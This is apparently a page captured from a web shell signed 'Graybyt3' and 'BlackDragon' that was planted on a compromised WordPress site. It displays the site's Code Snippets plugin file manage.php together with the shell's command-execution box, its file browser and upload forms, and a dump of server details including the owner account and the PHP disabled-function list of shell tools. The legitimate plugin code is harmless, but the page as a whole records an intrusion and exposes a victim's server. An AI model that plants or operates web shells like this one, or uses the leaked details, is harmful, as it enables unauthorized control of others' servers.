Graybyt3 Was Here
Linux webservices-17 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Apache/2.4.65 (Unix) OpenSSL/1.1.1f
127.0.0.1
/
home
/
sihate-co
/
webapps
/
sihate-co
/
public
/
wp-content
/
plugins
/
code-snippets
/
php
/
views
[ HOME ]
Exec
Submit
File Name : manage.php
<?php /** * HTML for the Manage Snippets page. * * @package Code_Snippets * @subpackage Views */ namespace Code_Snippets; /** * Loaded from the Manage_Menu class. * * @var Manage_Menu $this */ if ( ! defined( 'ABSPATH' ) ) { return; } $types = array_merge( [ 'all' => __( 'All Snippets', 'code-snippets' ) ], Plugin::get_types() ); $current_type = $this->get_current_type(); if ( false !== strpos( code_snippets()->version, 'beta' ) ) { echo '<div class="notice beta-test-notice"><p id="beta-testing">'; echo wp_kses( __( 'Thank you for testing this <span class="highlight-yellow">beta version of Code Snippets</span>. We would love to hear your feedback.', 'code-snippets' ), [ 'span' => [ 'class' => [ 'highlight-yellow' ] ] ] ); $feedback_url = __( 'mailto:team@codesnippets.pro?subject=Code Snippet Beta Test Feedback', 'code-snippets' ); printf( ' <a href="%s">%s</a>', esc_url( $feedback_url ), esc_html__( 'Click here to submit your feedback', 'code-snippets' ) ); echo '</p></div>'; } ?> <div class="wrap"> <h1> <?php esc_html_e( 'Snippets', 'code-snippets' ); $this->render_page_title_actions( code_snippets()->is_compact_menu() ? [ 'add', 'import', 'settings' ] : [ 'add', 'import' ] ); $this->list_table->search_notice(); ?> </h1> <?php $this->print_messages(); ?> <h2 class="nav-tab-wrapper" id="snippet-type-tabs"> <?php foreach ( $types as $type_name => $label ) { Admin::render_snippet_type_tab( $type_name, $label, $current_type ); } ?> <a class="button button-large nav-tab-button nav-tab-inactive go-pro-button" href="https://codesnippets.pro/pricing/" target="_blank" title="<?php esc_html_e( 'Find more about Pro (opens in external tab)', 'code-snippets' ); ?>"> <?php echo wp_kses( __( 'Upgrade to <span class="badge">Pro</span>', 'code-snippets' ), [ 'span' => [ 'class' => 'badge' ] ] ); ?> <span class="dashicons dashicons-external"></span> </a> </h2> <?php $type_info = [ 'php' => [ __( 'Function snippets are run on your site as if there were in a plugin or theme functions.php file.', 'code-snippets' ), __( 'Learn more about function snippets →', 'code-snippets' ), 'https://codesnippets.pro/learn-php/', ], 'html' => [ __( 'Content snippets are bits of reusable PHP and HTML content that can be inserted into posts and pages.', 'code-snippets' ), __( 'Learn more about content snippets →', 'code-snippets' ), 'https://codesnippets.pro/learn-html/', ], 'css' => [ __( 'Style snippets are written in CSS and loaded in the admin area or on the site front-end, just like the theme style.css.', 'code-snippets' ), esc_html__( 'Learn more about style snippets →', 'code-snippets' ), 'https://codesnippets.pro/learn-css/', ], 'js' => [ __( 'Script snippets are loaded on the site front-end in a JavaScript file, either in the head or body sections.', 'code-snippets' ), __( 'Learn more about javascript snippets →', 'code-snippets' ), 'https://codesnippets.pro/learn-js/', ], 'cloud' => [ __( 'See all your public and private snippets that are stored in your Code Snippet Cloud codevault.', 'code-snippets' ), __( 'Learn more about Code Snippets Cloud →', 'code-snippets' ), 'https://codesnippets.cloud/getstarted/', ], ]; if ( isset( $type_info[ $current_type ] ) ) { $info = $type_info[ $current_type ]; printf( '<p class="snippet-type-description">%s <a href="%s" target="_blank">%s</a></p>', esc_html( $info[0] ), esc_url( $info[2] ), esc_html( $info[1] ) ); } do_action( 'code_snippets/admin/manage/before_list_table' ); $this->list_table->views(); switch ( $current_type ) { case 'cloud_search': include_once 'partials/cloud-search.php'; break; default: include_once 'partials/list-table.php'; break; } do_action( 'code_snippets/admin/manage' ); ?> </div>
Back
Folder Name
Submit
File Name
File Content
Submit
System Information
Uname > Linux webservices-17 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 Software > Apache/2.4.65 (Unix) OpenSSL/1.1.1f PHP > 7.4.33 Protocol > HTTP/1.0 IP / Port > 127.0.0.1 / 80 Mail > ON Curl > ON Owner > sihate-co MySQL > OFF Disable Function > getmyuid,passthru,leak,listen,diskfreespace,tmpfile,link,ignore_user_abort,shell_exec,dl,set_time_limit,exec,system,highlight_file,source,show_source,fpassthru,virtual,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,proc_open,proc_close,proc_nice,proc_terminate,escapeshellcmd,ini_alter,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connect,symlink,posix_geteuid,ini_alter,socket_listen,socket_create_listen,socket_read,socket_create_pair,stream_socket_server
*ReClick For Close
File : BlackDragon /about/function.php
Name
Type
Size
Owner/Group
Permission
Last Modified
Actions
.
dir
-
1002/1003
0555
2024-12-09 10:40:55
..
dir
-
1002/1003
0555
2024-12-09 10:40:55
partials
dir
-
1002/1003
0555
2024-12-03 02:16:06
import.php
text/x-php
3.32 KB
1002/1003
0644
2025-03-09 06:25:20
manage.php
text/x-php
3.83 KB
1002/1003
0644
2025-11-04 02:26:43
© BlackDragon